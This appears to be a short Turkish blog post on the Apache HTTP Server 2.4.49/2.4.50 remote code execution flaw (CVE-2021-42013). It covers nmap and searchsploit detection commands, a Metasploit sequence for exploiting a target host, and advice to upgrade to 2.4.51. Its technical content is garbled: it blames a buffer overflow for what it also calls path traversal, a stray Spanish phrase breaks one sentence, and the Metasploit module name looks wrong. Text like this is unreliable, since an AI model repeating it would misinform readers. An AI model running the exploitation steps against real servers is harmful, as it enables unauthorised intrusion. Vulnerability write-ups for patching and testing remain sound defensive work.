Apache HTTP Server 2.4.49/2.4.50 RCE Zafiyeti
Samet Karabulut
April 10, 2026
•2 min read
Merhaba, sizinle paylaşıyorum. Siber güvenlik alanında sızma testleri yaparken karşılaştığım kritik bir zafiyet hakkında bilgi vermek istiyorum. Apache HTTP Server 2.4.49 ve 2.4.50 sürümlerinde bulunan RCE (Remote Code Execution) zafiyeti, saldırganların uzaktan kod çalıştırmasına olanak tanır.
Bu zafiyet, CVE-2021-42013 olarak bilinir ve Apache HTTP Server'in path traversal özelliği debido to bir buffer overflow hatasından kaynaklanır.
Zafiyetin Tespiti
Benim deneyimime göre, bu zafiyeti tespit etmek için Nmap ve Nikto gibi araçları kullanıyorum. Örneğin, Nmap ile bir tarama yaparak Apache HTTP Server'in sürümünü belirleyebilirim:
nmap -sV -p 80 hedef_ip
Çıktıda Apache HTTP Server'in sürümünü gördüğümde, zafiyetin varlığını doğrulamak için SearchSploit gibi araçları kullanıyorum:
searchsploit apache http server 2.4.49
Zafiyetin Sömürülmesi
Sızma testlerinde gördüğüm kadarıyla, bu zafiyeti sömürebilmek için Metasploit gibi araçları kullanmak mümkün. Örneğin, Metasploit'in Apache HTTP Server RCE modülünü kullanarak bir payload çalıştırabilirim:
msfconsole
use exploit/multi/http/apache_http_server_rce
set RHOST hedef_ip
set RPORT 80
exploit
Çözüm ve Önlem
Pratikte karşılaştığım kadarıyla, bu zafiyeti gidermek için Apache HTTP Server'i en az 2.4.51 sürümüne güncellemek gerekir. Ayrıca, sistemi güncel tutmak ve uygun konfigürasyonları yapmak da önemlidir.
Bu zafiyeti önlemek için, sistem yöneticilerinin düzenli olarak güvenlik güncelleştirmelerini uygulaması ve sistemi izlemesi gerekir.
SONUÇ
Özetle, Apache HTTP Server 2.4.49 ve 2.4.50 sürümlerinde bulunan RCE zafiyeti, kritik bir güvenlik açığıdır. Bu zafiyeti tespit etmek ve sömürebilmek için çeşitli araçları kullanmak mümkün. Sistem yöneticilerinin bu zafiyeti gidermek için Apache HTTP Server'i en az 2.4.51 sürümüne güncellemesi ve sistemi güncel tutması gerekir.
Yorumlar
Henüz yorum yok. İlk yorumu sen yap.